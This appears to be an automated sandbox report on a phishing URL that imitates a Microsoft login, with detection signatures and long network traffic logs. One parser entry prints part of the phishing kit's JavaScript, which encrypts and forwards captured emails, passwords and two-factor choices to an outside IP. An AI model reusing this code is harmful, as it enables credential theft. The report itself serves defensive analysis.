Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6

Overview

General Information

Sample URL:https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6
Analysis ID:1467811

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
Phishing site detected (based on image similarity)
Phishing site detected (based on shot match)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Invalid T&C link found
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 5748 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 5700 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1960,i,1975966168969992740,16174206318900922862,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
SourceRuleDescriptionAuthorStrings
5.11.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    5.10.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: https://btee.pradjoun.comLLM: Score: 9 brands: Microsoft Reasons: The URL 'https://btee.pradjoun.com' does not match the legitimate domain 'microsoft.com' associated with the Microsoft brand. The webpage closely resembles the legitimate Microsoft login page, which is a common social engineering technique used in phishing attacks. The presence of a prominent login form asking for sensitive information (email, phone, or Skype) further raises suspicion. Additionally, the domain 'pradjoun.com' is not associated with Microsoft, making it highly likely that this is a phishing site. DOM: 5.10.pages.csv
      Source: Yara matchFile source: 5.11.pages.csv, type: HTML
      Source: Yara matchFile source: 5.10.pages.csv, type: HTML
      Source: https://btee.pradjoun.com/4568592340690659807886655klzbsrguyuiguljwwp?pekjpjlosdbcmbuaikynxsqu415599126942126195349977DVOJZSOYLHJAELYCOVVQMatcher: Found strong image similarity, brand: MICROSOFT
      Source: https://btee.pradjoun.com/XUYZ/Matcher: Template: captcha matched
      Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ni0us/0x4AAAAAAAdLo7zOQCu_B31U/auto/normalMatcher: Template: captcha matched
      Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ni0us/0x4AAAAAAAdLo7zOQCu_B31U/auto/normalMatcher: Template: captcha matched
      Source: https://btee.pradjoun.com/4568592340690659807886655klzbsrguyuiguljwwp?pekjpjlosdbcmbuaikynxsqu415599126942126195349977DVOJZSOYLHJAELYCOVVQHTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "kTlQP";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "ajszJBRncxX70OlOUYX2Kn8btqrbkaoRGstx4JSmnV37R891fvJXTt8wn0t";var gdf = "ij84AnnNimS3DTViWhX1ArlQZThhHxyzgA2GEm4OhKwNab114";var odf = "ijkXD7W1Aga2TXi1iVql3uvlDRXSpTgiLtgTufpYcd650";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome|chromium|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false || route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)/gm;}if(route == "checkpass"){randpattern = /(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)/gm;}if(route == "twofaselect"){randpattern = /(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)/gm;}if(route == "twofaselected"){randpattern = /(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // type: 'GET',
      Source: https://btee.pradjoun.com/4568592340690659807886655klzbsrguyuiguljwwp?pekjpjlosdbcmbuaikynxsqu415599126942126195349977DVOJZSOYLHJAELYCOVVQHTTP Parser: Number of links: 0
      Source: https://btee.pradjoun.com/4568592340690659807886655klzbsrguyuiguljwwp?pekjpjlosdbcmbuaikynxsqu415599126942126195349977DVOJZSOYLHJAELYCOVVQHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://btee.pradjoun.com/XUYZ/HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <script src="https://cdnjs.cloudflar...
      Source: https://btee.pradjoun.com/4568592340690659807886655klzbsrguyuiguljwwp?pekjpjlosdbcmbuaikynxsqu415599126942126195349977DVOJZSOYLHJAELYCOVVQHTTP Parser: Title: Mental Health does not match URL
      Source: https://btee.pradjoun.com/4568592340690659807886655klzbsrguyuiguljwwp?pekjpjlosdbcmbuaikynxsqu415599126942126195349977DVOJZSOYLHJAELYCOVVQHTTP Parser: Invalid link: Terms of use
      Source: https://btee.pradjoun.com/4568592340690659807886655klzbsrguyuiguljwwp?pekjpjlosdbcmbuaikynxsqu415599126942126195349977DVOJZSOYLHJAELYCOVVQHTTP Parser: Invalid link: Privacy & cookies
      Source: https://btee.pradjoun.com/4568592340690659807886655klzbsrguyuiguljwwp?pekjpjlosdbcmbuaikynxsqu415599126942126195349977DVOJZSOYLHJAELYCOVVQHTTP Parser: <input type="password" .../> found
      Source: https://btee.pradjoun.com/XUYZ/HTTP Parser: No favicon
      Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ni0us/0x4AAAAAAAdLo7zOQCu_B31U/auto/normalHTTP Parser: No favicon
      Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ni0us/0x4AAAAAAAdLo7zOQCu_B31U/auto/normalHTTP Parser: No favicon
      Source: https://btee.pradjoun.com/4568592340690659807886655klzbsrguyuiguljwwp?pekjpjlosdbcmbuaikynxsqu415599126942126195349977DVOJZSOYLHJAELYCOVVQHTTP Parser: No favicon
      Source: https://btee.pradjoun.com/4568592340690659807886655klzbsrguyuiguljwwp?pekjpjlosdbcmbuaikynxsqu415599126942126195349977DVOJZSOYLHJAELYCOVVQHTTP Parser: No <meta name="author".. found
      Source: https://btee.pradjoun.com/4568592340690659807886655klzbsrguyuiguljwwp?pekjpjlosdbcmbuaikynxsqu415599126942126195349977DVOJZSOYLHJAELYCOVVQHTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49761 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.19.244.127:443 -> 192.168.2.17:49874 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.19.244.127:443 -> 192.168.2.17:49881 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.190.159.73:443 -> 192.168.2.17:49983 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49987 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.23.209.187:443 -> 192.168.2.17:49993 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:50012 version: TLS 1.2
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
      Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
      Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: share.mindmanager.com
      Source: global trafficDNS traffic detected: DNS query: apis.google.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: ipm.corel.com
      Source: global trafficDNS traffic detected: DNS query: cloud.mindmanager.com
      Source: global trafficDNS traffic detected: DNS query: us.sharing.mindmanager.com
      Source: global trafficDNS traffic detected: DNS query: cdn.amplitude.com
      Source: global trafficDNS traffic detected: DNS query: unpkg.com
      Source: global trafficDNS traffic detected: DNS query: cdn.cookielaw.org
      Source: global trafficDNS traffic detected: DNS query: geolocation.onetrust.com
      Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
      Source: global trafficDNS traffic detected: DNS query: btee.pradjoun.com
      Source: global trafficDNS traffic detected: DNS query: z5eq.081zq.com
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
      Source: global trafficDNS traffic detected: DNS query: github.com
      Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
      Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50257 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
      Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
      Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50292 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
      Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50303 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50269 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
      Source: unknownNetwork traffic detected: HTTP traffic on port 50280 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
      Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50221 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50301 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
      Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownNetwork traffic detected: HTTP traffic on port 50277 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50305 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
